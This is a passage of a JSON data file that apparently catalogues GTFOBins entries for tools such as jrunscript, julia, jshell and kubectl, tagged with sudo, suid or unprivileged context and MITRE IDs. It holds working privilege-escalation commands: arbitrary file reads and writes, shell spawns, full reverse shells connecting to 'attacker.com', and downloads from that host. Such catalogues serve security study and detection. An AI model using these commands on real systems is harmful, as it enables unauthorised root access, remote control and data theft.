installation","aliases":[]},{"id":"gtfo:jrunscript:file-read:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jrunscript -e 'br = new BufferedReader(new java.io.FileReader(\"/path/to/input-file\"));\n while ((line = br.readLine()) != null) { print(line); }'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:file-read:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jrunscript -e 'br = new BufferedReader(new java.io.FileReader(\"/path/to/input-file\"));\n while ((line = br.readLine()) != null) { print(line); }'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:file-write:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"jrunscript -e 'var fw=new java.io.FileWriter(\"/path/to/output-file\");\n fw.write(\"DATA\");\n fw.close();'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:file-write:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"jrunscript -e 'var fw=new java.io.FileWriter(\"/path/to/output-file\");\n fw.write(\"DATA\");\n fw.close();'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:reverse-shell:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"jrunscript -e 'var host=\"attacker.com\";\n var port=12345;\n var p=new java.lang.ProcessBuilder(\"/bin/sh\", \"-i\").redirectErrorStream(true).start();\n var s=new java.net.Socket(host,port);\n var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\n var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){\n while(pi.available()>0)so.write(pi.read());\n while(pe.available()>0)so.write(pe.read());\n while(si.available()>0)po.write(si.read());\n so.flush();po.flush();\n java.lang.Thread.sleep(50);\n try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:reverse-shell:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"jrunscript -e 'var host=\"attacker.com\";\n var port=12345;\n var p=new java.lang.ProcessBuilder(\"/bin/sh\", \"-i\").redirectErrorStream(true).start();\n var s=new java.net.Socket(host,port);\n var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\n var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){\n while(pi.available()>0)so.write(pi.read());\n while(pe.available()>0)so.write(pe.read());\n while(si.available()>0)po.write(si.read());\n so.flush();po.flush();\n java.lang.Thread.sleep(50);\n try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:shell:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jrunscript -e 'exec(\"/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:shell:0:suid","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jrunscript -e 'exec(\"/bin/sh -pc $@|sh${IFS}-p _ echo sh -p </dev/tty >/dev/tty 2>/dev/tty\")'","description":"This has been found working in macOS but failing on Linux systems.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:shell:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jrunscript -e 'exec(\"/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jshell:file-read:0:sudo","toolId":"gtfo:jshell","toolName":"jshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jshell\njshell> /open /path/to/input-file","description":"The content is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jshell:file-read:0:unprivileged","toolId":"gtfo:jshell","toolName":"jshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jshell\njshell> /open /path/to/input-file","description":"The content is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jshell:file-write:0:sudo","toolId":"gtfo:jshell","toolName":"jshell","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"jshell\nString x = \"DATA\";\n/save /path/to/output-file","description":"Writes only the valid Java code to file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jshell:file-write:0:unprivileged","toolId":"gtfo:jshell","toolName":"jshell","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"jshell\nString x = \"DATA\";\n/save /path/to/output-file","description":"Writes only the valid Java code to file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jshell:shell:0:sudo","toolId":"gtfo:jshell","toolName":"jshell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jshell\nRuntime.getRuntime().exec(\"/path/to/command\");","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jshell:shell:0:unprivileged","toolId":"gtfo:jshell","toolName":"jshell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jshell\nRuntime.getRuntime().exec(\"/path/to/command\");","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jtag:shell:0:sudo","toolId":"gtfo:jtag","toolName":"jtag","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jtag --interactive\nshell /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jtag/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jtag:shell:0:unprivileged","toolId":"gtfo:jtag","toolName":"jtag","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jtag --interactive\nshell /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jtag/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:download:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"julia -e 'download(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:download:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"julia -e 'download(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:download:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"julia -e 'download(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:file-read:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"julia -e 'print(open(f->read(f, String), \"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:file-read:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"julia -e 'print(open(f->read(f, String), \"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:file-read:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"julia -e 'print(open(f->read(f, String), \"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:file-write:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"julia -e 'open(f->write(f, \"DATA\"), /path/to/output-file, \"w\")'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:file-write:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"julia -e 'open(f->write(f, \"DATA\"), /path/to/output-file, \"w\")'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:file-write:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"julia -e 'open(f->write(f, \"DATA\"), /path/to/output-file, \"w\")'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:reverse-shell:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"julia -e 'using Sockets; sock=connect(\"attacker.com\", parse(Int64, 12345)); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:reverse-shell:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"julia -e 'using Sockets; sock=connect(\"attacker.com\", parse(Int64, 12345)); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:reverse-shell:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"julia -e 'using Sockets; sock=connect(\"attacker.com\", parse(Int64, 12345)); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:shell:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"julia -e 'run(`/bin/sh`)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:shell:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"julia -e 'run(`/bin/sh -p`)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:shell:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"julia -e 'run(`/bin/sh`)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:knife:inherit:0:sudo","toolId":"gtfo:knife","toolName":"knife","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"knife exec -E '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/knife/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:knife:inherit:0:unprivileged","toolId":"gtfo:knife","toolName":"knife","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"knife exec -E '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/knife/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ksshell:file-read:0:sudo","toolId":"gtfo:ksshell","toolName":"ksshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ksshell -i /path/to/input-file","description":"Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ksshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ksshell:file-read:0:suid","toolId":"gtfo:ksshell","toolName":"ksshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ksshell -i /path/to/input-file","description":"Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ksshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ksshell:file-read:0:unprivileged","toolId":"gtfo:ksshell","toolName":"ksshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ksshell -i /path/to/input-file","description":"Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ksshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ksu:shell:0:sudo","toolId":"gtfo:ksu","toolName":"ksu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ksu -q -e /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ksu/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:kubectl:shell:0:sudo","toolId":"gtfo:kubectl","toolName":"kubectl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cat >/path/to/temp-file <<EOF\nclusters:\n- cluster:\n server: https://x\n name: x\ncontexts:\n- context:\n cluster: x\n user: x\n name: x\ncurrent-context: x\nusers:\n- name: x\n user:\n exec:\n apiVersion: client.authentication.k8s.io/v1\n interactiveMode: Always\n command: /bin/sh\n args:\n - '-c'\n - '/bin/sh 0<&2 1>&2'\nEOF\n\nkubectl get pods --kubeconfig=/path/to/temp-file","description":"The shell is spawn multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/kubectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:kubectl:shell:0:unprivileged","toolId":"gtfo:kubectl","toolName":"kubectl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cat >/path/to/temp-file <<EOF\nclusters:\n- cluster:\n server: https://x\n name: x\ncontexts:\n- context:\n cluster: x\n user: x\n name: x\ncurrent-context: x\nusers:\n- name: x\n user:\n exec:\n apiVersion: client.authentication.k8s.io/v1\n interactiveMode: Always\n command: /bin/sh\n args:\n - '-c'\n - '/bin/sh 0<&2 1>&2'\nEOF\n\nkubectl get pods --kubeconfig=/path/to/temp-file","description":"The shell is spawn multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/kubectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:kubectl:upload:0:sudo","toolId":"gtfo:kubectl","toolName":"kubectl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/kubectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:kubectl:upload:0:suid","toolId":"gtfo:kubectl","toolName":"kubectl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/kubectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:kubectl:upload:0:unprivileged","toolId":"gtfo:kubectl","toolName":"kubectl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/kubectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:last:file-read:0:sudo","toolId":"gtfo:last","toolName":"last","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"last -a -f /path/to/input-file","description":"The output might be corrupted or incomplete if the file does not follow the expected database format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/last/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["lastb"]},{"id":"gtfo:last:file-read:0:suid","toolId":"gtfo:last","toolName":"last","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"last -a -f /path/to/input-file","description":"The output might be corrupted or incomplete if the file does not follow the expected database format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/last/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["lastb"]},{"id":"gtfo:last:file-read:0:unprivileged","toolId":"gtfo:last","toolName":"last","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"last -a -f /path/to/input-file","description":"The output might be corrupted or incomplete if the file does not follow the expected database format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/last/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["lastb"]},{"id":"gtfo:latex:file-read:0:sudo","toolId":"gtfo:latex","toolName":"latex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\nstrings texput.dvi","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 